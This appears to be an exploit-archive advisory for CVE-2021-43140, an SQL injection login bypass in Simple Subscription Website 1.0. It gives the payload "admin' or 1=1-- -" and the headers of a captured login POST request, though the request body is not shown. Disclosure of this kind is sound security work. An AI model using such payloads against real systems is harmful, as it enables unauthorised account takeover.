Simple Subscription Website 1.0 SQL Injection

Simple Subscription Website version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

MD5 | d0f2418dde749f911db5dbbbbd28b417

# Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass
# Exploit Author: Daniel Haro (Dirox)
# Vendor Homepage:
# Software Link:
# Version: Simple Subscription Website 1.0
# Tested on: Windows, xampp
# CVE: CVE-2021-43140

- Description:
SQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. An account takeover exists with the payload: admin' or 1=1-- -


POST /plan_application/Actions.php?a=login HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 57
Connection: close
Cookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3


Related Posts